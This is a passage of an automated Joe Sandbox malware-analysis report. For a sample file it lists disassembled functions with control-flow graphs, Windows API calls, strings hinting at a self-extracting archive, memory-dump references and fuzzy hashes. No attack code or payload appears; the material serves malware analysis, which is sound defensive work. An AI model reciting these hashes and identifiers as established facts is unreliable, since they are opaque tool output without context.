                                                                      • ShowWindow.USER32(?,00000001), ref: 007DD9E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                      • String ID: .exe$.inf$PDGu<}$h}$r}
                                                                      • API String ID: 36480843-3163435001
                                                                      • Opcode ID: c9a1b374de85f007e9991e20a3e48eec0ddac5b51454beaaced903b55736712c
                                                                      • Instruction ID: 2983e0e07464b75c6429421cc6425e7d0b03413493cb595671507eaaac526652
                                                                      • Opcode Fuzzy Hash: c9a1b374de85f007e9991e20a3e48eec0ddac5b51454beaaced903b55736712c
                                                                      • Instruction Fuzzy Hash: 4551E370408380AADB319B249854BABBBF8EF45744F04441FF5C0973A1E7BAAE44DB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007E3B72 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63COMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 913 7e3b72-7e3b7c 914 7e3bee-7e3bf1 913->914 915 7e3b7e-7e3b8c 914->915 916 7e3bf3 914->916 918 7e3b8e-7e3b91 915->918 919 7e3b95-7e3bb1 LoadLibraryExW 915->919 917 7e3bf5-7e3bf9 916->917 920 7e3c09-7e3c0b 918->920 921 7e3b93 918->921 922 7e3bfa-7e3c00 919->922 923 7e3bb3-7e3bbc GetLastError 919->923 920->917 925 7e3beb 921->925 922->920 924 7e3c02-7e3c03 FreeLibrary 922->924 926 7e3bbe-7e3bd3 call 7e6088 923->926 927 7e3be6-7e3be9 923->927 924->920 925->914 926->927 930 7e3bd5-7e3be4 LoadLibraryExW 926->930 927->925 930->922 930->927
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,007E3C35,00000000,00000FA0,00822088,00000000,?,007E3D60,00000004,InitializeCriticalSectionEx,007F6394,InitializeCriticalSectionEx,00000000), ref: 007E3C03
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID: api-ms-$c*~
                                                                      • API String ID: 3664257935-2109102344
                                                                      • Opcode ID: dda27ba78db19e51cd9a95d3c2a512b017b4fce98f17b48e8fcfb2924f4ae3c0
                                                                      • Instruction ID: 24ee1a6567ecff5d817a40977183a86401de75cca0cf6457f7af154e586f16f6
                                                                      • Opcode Fuzzy Hash: dda27ba78db19e51cd9a95d3c2a512b017b4fce98f17b48e8fcfb2924f4ae3c0
                                                                      • Instruction Fuzzy Hash: C2110AB1A06264ABCB218B5E9C49B5A3764AF09770F250211E912FB2D0D738EF00C6D5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007EA95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 931 7ea95b-7ea974 932 7ea98a-7ea98f 931->932 933 7ea976-7ea986 call 7eef4c 931->933 935 7ea99c-7ea9c0 MultiByteToWideChar 932->935 936 7ea991-7ea999 932->936 933->932 943 7ea988 933->943 937 7ea9c6-7ea9d2 935->937 938 7eab53-7eab66 call 7dfbbc 935->938 936->935 940 7eaa26 937->940 941 7ea9d4-7ea9e5 937->941 947 7eaa28-7eaa2a 940->947 944 7ea9e7-7ea9f6 call 7f2010 941->944 945 7eaa04-7eaa15 call 7e8e06 941->945 943->932 950 7eab48 944->950 957 7ea9fc-7eaa02 944->957 945->950 958 7eaa1b 945->958 947->950 951 7eaa30-7eaa43 MultiByteToWideChar 947->951 955 7eab4a-7eab51 call 7eabc3 950->955 951->950 954 7eaa49-7eaa5b call 7eaf6c 951->954 960 7eaa60-7eaa64 954->960 955->938 962 7eaa21-7eaa24 957->962 958->962 960->950 963 7eaa6a-7eaa71 960->963 962->947 964 7eaaab-7eaab7 963->964 965 7eaa73-7eaa78 963->965 967 7eaab9-7eaaca 964->967 968 7eab03 964->968 965->955 966 7eaa7e-7eaa80 965->966 966->950 969 7eaa86-7eaaa0 call 7eaf6c 966->969 971 7eaacc-7eaadb call 7f2010 967->971 972 7eaae5-7eaaf6 call 7e8e06 967->972 970 7eab05-7eab07 968->970 969->955 984 7eaaa6 969->984 974 7eab09-7eab22 call 7eaf6c 970->974 975 7eab41-7eab47 call 7eabc3 970->975 971->975 987 7eaadd-7eaae3 971->987 972->975 983 7eaaf8 972->983 974->975 989 7eab24-7eab2b 974->989 975->950 988 7eaafe-7eab01 983->988 984->950 987->988 988->970 990 7eab2d-7eab2e 989->990 991 7eab67-7eab6d 989->991 992 7eab2f-7eab3f WideCharToMultiByte 990->992 991->992 992->975 993 7eab6f-7eab76 call 7eabc3 992->993 993->955
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,007E57FB,007E57FB,?,?,?,007EABAC,00000001,00000001,2DE85006), ref: 007EA9B5
                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,007EABAC,00000001,00000001,2DE85006,?,?,?), ref: 007EAA3B
                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007EAB35
                                                                      • __freea.LIBCMT ref: 007EAB42
                                                                        • Part of subcall function 007E8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,007E4286,?,0000015D,?,?,?,?,007E5762,000000FF,00000000,?,?), ref: 007E8E38
                                                                      • __freea.LIBCMT ref: 007EAB4B
                                                                      • __freea.LIBCMT ref: 007EAB70
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1414292761-0
                                                                      • Opcode ID: 8f7267a825d0d994acd9e56f4ff5b000b021b283d46f68b6b76b6019c3fa4538
                                                                      • Instruction ID: 19d8f6f0da44ad525f56bc8880c61d20ce44204ae6222e5635765b7022527a1e
                                                                      • Opcode Fuzzy Hash: 8f7267a825d0d994acd9e56f4ff5b000b021b283d46f68b6b76b6019c3fa4538
                                                                      • Instruction Fuzzy Hash: 8E51E5B2601256BFDB258F66CC45EBFB7AAEB48750F154629FC04D6140EB3CEC40C6A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DABAB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 996 7dabab-7dabca GetClassNameW 997 7dabcc-7dabe1 call 7d1fbb 996->997 998 7dabf2-7dabf4 996->998 1003 7dabf1 997->1003 1004 7dabe3-7dabef FindWindowExW 997->1004 1000 7dabff-7dac01 998->1000 1001 7dabf6-7dabf8 998->1001 1001->1000 1003->998 1004->1003
                                                                      APIs
                                                                      • GetClassNameW.USER32(?,?,00000050), ref: 007DABC2
                                                                      • SHAutoComplete.SHLWAPI(?,00000010), ref: 007DABF9
                                                                        • Part of subcall function 007D1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,007CC116,00000000,.exe,?,?,00000800,?,?,?,007D8E3C), ref: 007D1FD1
                                                                      • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 007DABE9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                      • String ID: @Ut$EDIT
                                                                      • API String ID: 4243998846-2065656831
                                                                      • Opcode ID: e393538f4f6f4c4eb72fac6cf8a2fa120af54e5e523265cd38a5db366d29dcbf
                                                                      • Instruction ID: 362337cbc35f0bec6df66d3b835db2dd6aee6c49d8a56f3edd9ae330c1bc6226
                                                                      • Opcode Fuzzy Hash: e393538f4f6f4c4eb72fac6cf8a2fa120af54e5e523265cd38a5db366d29dcbf
                                                                      • Instruction Fuzzy Hash: 58F0827260162977DB3097249C09F9B767CAB46B40F484023BA05A22C0D769DA4285BA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DAC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 007D081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007D0836
                                                                        • Part of subcall function 007D081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,007CF2D8,Crypt32.dll,00000000,007CF35C,?,?,007CF33E,?,?,?), ref: 007D0858
                                                                      • OleInitialize.OLE32(00000000), ref: 007DAC2F
                                                                      • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 007DAC66
                                                                      • SHGetMalloc.SHELL32(00808438), ref: 007DAC70
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                      • String ID: riched20.dll$3So
                                                                      • API String ID: 3498096277-3464455743
                                                                      • Opcode ID: 4d1d5c0a8a63993b6927dc73a31c060b33fe2b61a0e2d1b41fba66ff3de454f6
                                                                      • Instruction ID: 4d1cbf3a69a3c5d0d54809a4e3fbb8a95e84fe4e9268e3da6fb27bfc231324e5
                                                                      • Opcode Fuzzy Hash: 4d1d5c0a8a63993b6927dc73a31c060b33fe2b61a0e2d1b41fba66ff3de454f6
                                                                      • Instruction Fuzzy Hash: 33F0F9B1D00209ABCB20AFA9D8499AFFBFCFF84700F00415AA455E2241DBB856468BA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C98E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1009 7c98e0-7c9901 call 7dec50 1012 7c990c 1009->1012 1013 7c9903-7c9906 1009->1013 1015 7c990e-7c991f 1012->1015 1013->1012 1014 7c9908-7c990a 1013->1014 1014->1015 1016 7c9927-7c9931 1015->1016 1017 7c9921 1015->1017 1018 7c9936-7c9943 call 7c6edb 1016->1018 1019 7c9933 1016->1019 1017->1016 1022 7c994b-7c996a CreateFileW 1018->1022 1023 7c9945 1018->1023 1019->1018 1024 7c996c-7c998e GetLastError call 7cbb03 1022->1024 1025 7c99bb-7c99bf 1022->1025 1023->1022 1028 7c99c8-7c99cd 1024->1028 1031 7c9990-7c99b3 CreateFileW GetLastError 1024->1031 1026 7c99c3-7c99c6 1025->1026 1026->1028 1029 7c99d9-7c99de 1026->1029 1028->1029 1032 7c99cf 1028->1032 1033 7c99ff-7c9a10 1029->1033 1034 7c99e0-7c99e3 1029->1034 1031->1026 1035 7c99b5-7c99b9 1031->1035 1032->1029 1037 7c9a2e-7c9a39 1033->1037 1038 7c9a12-7c9a2a call 7d0602 1033->1038 1034->1033 1036 7c99e5-7c99f9 SetFileTime 1034->1036 1035->1026 1036->1033 1038->1037
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,007C7760,?,00000005,?,00000011), ref: 007C995F
                                                                      • GetLastError.KERNEL32(?,?,007C7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007C996C
                                                                      • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,007C7760,?,00000005,?), ref: 007C99A2
                                                                      • GetLastError.KERNEL32(?,?,007C7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007C99AA
                                                                      • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,007C7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007C99F9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: File$CreateErrorLast$Time
                                                                      • String ID:
                                                                      • API String ID: 1999340476-0
                                                                      • Opcode ID: d13962da5708c8a076a98fa1c64f41e3a8cbd2d34ebdf8452017d8ab024380ef
                                                                      • Instruction ID: c4dc74600d571827c8623bde7093d6bf6902685f900604f515d60ba057e95866
                                                                      • Opcode Fuzzy Hash: d13962da5708c8a076a98fa1c64f41e3a8cbd2d34ebdf8452017d8ab024380ef
                                                                      • Instruction Fuzzy Hash: 4A312330544745AFE7709F24CC4EFEABB94BB84320F200B1EFAA1961D0D7B8A954CB95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DB568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1068 7db568-7db581 PeekMessageW 1069 7db5bc-7db5be 1068->1069 1070 7db583-7db597 GetMessageW 1068->1070 1071 7db599-7db5a6 IsDialogMessageW 1070->1071 1072 7db5a8-7db5b6 TranslateMessage DispatchMessageW 1070->1072 1071->1069 1071->1072 1072->1069
                                                                      APIs
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007DB579
                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007DB58A
                                                                      • IsDialogMessageW.USER32(0001047C,?), ref: 007DB59E
                                                                      • TranslateMessage.USER32(?), ref: 007DB5AC
                                                                      • DispatchMessageW.USER32(?), ref: 007DB5B6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Message$DialogDispatchPeekTranslate
                                                                      • String ID:
                                                                      • API String ID: 1266772231-0
                                                                      • Opcode ID: 487506b0ba27a81aecc59e39ca88fe2ec5df16988e80ca368a6dcbfeeeafada8
                                                                      • Instruction ID: d18900fad41bbd9da0f18ca1334faa5ec10bacfaf09a7b2ad4265053ec8634ed
                                                                      • Opcode Fuzzy Hash: 487506b0ba27a81aecc59e39ca88fe2ec5df16988e80ca368a6dcbfeeeafada8
                                                                      • Instruction Fuzzy Hash: 0DF0BD71A0111AABCB209BE5AC5CDDB7FBCEE056917008415B506D2110EB38D616CBB4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DDBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1073 7ddbde-7ddc09 call 7dec50 SetEnvironmentVariableW call 7d0371 1077 7ddc0e-7ddc12 1073->1077 1078 7ddc14-7ddc18 1077->1078 1079 7ddc36-7ddc38 1077->1079 1080 7ddc21-7ddc28 call 7d048d 1078->1080 1083 7ddc1a-7ddc20 1080->1083 1084 7ddc2a-7ddc30 SetEnvironmentVariableW 1080->1084 1083->1080 1084->1079
                                                                      APIs
                                                                      • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 007DDBF4
                                                                      • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 007DDC30
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: EnvironmentVariable
                                                                      • String ID: sfxcmd$sfxpar
                                                                      • API String ID: 1431749950-3493335439
                                                                      • Opcode ID: f9f385a5b4b19562fc8535e16b4a587c2570c1a53f429e8b823a54786f74f107
                                                                      • Instruction ID: 80ca6c157602fa0916c6d3cf9fbad7384d0c47b1ace49fe4290ebb15af7801e0
                                                                      • Opcode Fuzzy Hash: f9f385a5b4b19562fc8535e16b4a587c2570c1a53f429e8b823a54786f74f107
                                                                      • Instruction Fuzzy Hash: 48F0A7B241462CEACB302B94CC0ABBA3B68AF05781F040416BE8996251E6BC9D40D6B0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C9785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1085 7c9785-7c9791 1086 7c979e-7c97b5 ReadFile 1085->1086 1087 7c9793-7c979b GetStdHandle 1085->1087 1088 7c97b7-7c97c0 call 7c98bc 1086->1088 1089 7c9811 1086->1089 1087->1086 1093 7c97d9-7c97dd 1088->1093 1094 7c97c2-7c97ca 1088->1094 1091 7c9814-7c9817 1089->1091 1096 7c97ee-7c97f2 1093->1096 1097 7c97df-7c97e8 GetLastError 1093->1097 1094->1093 1095 7c97cc 1094->1095 1100 7c97cd-7c97d7 call 7c9785 1095->1100 1098 7c980c-7c980f 1096->1098 1099 7c97f4-7c97fc 1096->1099 1097->1096 1101 7c97ea-7c97ec 1097->1101 1098->1091 1099->1098 1102 7c97fe-7c9807 GetLastError 1099->1102 1100->1091 1101->1091 1102->1098 1104 7c9809-7c980a 1102->1104 1104->1100
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 007C9795
                                                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 007C97AD
                                                                      • GetLastError.KERNEL32 ref: 007C97DF
                                                                      • GetLastError.KERNEL32 ref: 007C97FE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$FileHandleRead
                                                                      • String ID:
                                                                      • API String ID: 2244327787-0
                                                                      • Opcode ID: 48d373b9623dbd1544b4844d4f9aefa4f9fe11366ab8172ff007b6540b8340aa
                                                                      • Instruction ID: 3f60b60d6d2149b90ef92b321042bf0d56cc3c449e7e7c83e4ab932897554007
                                                                      • Opcode Fuzzy Hash: 48d373b9623dbd1544b4844d4f9aefa4f9fe11366ab8172ff007b6540b8340aa
                                                                      • Instruction Fuzzy Hash: 0D117C31914204EBDFA05F64C80CF6937E9BB42320F10892EEA1686190DB7C9E44DB65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007EAD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,007E40EF,00000000,00000000,?,007EACDB,007E40EF,00000000,00000000,00000000,?,007EAED8,00000006,FlsSetValue), ref: 007EAD66
                                                                      • GetLastError.KERNEL32(?,007EACDB,007E40EF,00000000,00000000,00000000,?,007EAED8,00000006,FlsSetValue,007F7970,FlsSetValue,00000000,00000364,?,007E98B7), ref: 007EAD72
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,007EACDB,007E40EF,00000000,00000000,00000000,?,007EAED8,00000006,FlsSetValue,007F7970,FlsSetValue,00000000), ref: 007EAD80
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 3177248105-0
                                                                      • Opcode ID: 713e33b1304fceeaa05e09e3cddf8d3c7e72d87203042fc050e5f1b2f974ddfe
                                                                      • Instruction ID: 201a02b1dd40a2d29a2a728f085030e56e58cb97bc23ed239973275653689172
                                                                      • Opcode Fuzzy Hash: 713e33b1304fceeaa05e09e3cddf8d3c7e72d87203042fc050e5f1b2f974ddfe
                                                                      • Instruction Fuzzy Hash: 4101F736302262BBC721CA6A9C44AA77B58FF09BA27114620F916D7654DB28E801C6E5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007D101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 007D1043
                                                                      • SetThreadPriority.KERNEL32(?,00000000), ref: 007D108A
                                                                        • Part of subcall function 007C6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007C6C54
                                                                        • Part of subcall function 007C6DCB: _wcschr.LIBVCRUNTIME ref: 007C6E0A
                                                                        • Part of subcall function 007C6DCB: _wcschr.LIBVCRUNTIME ref: 007C6E19
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
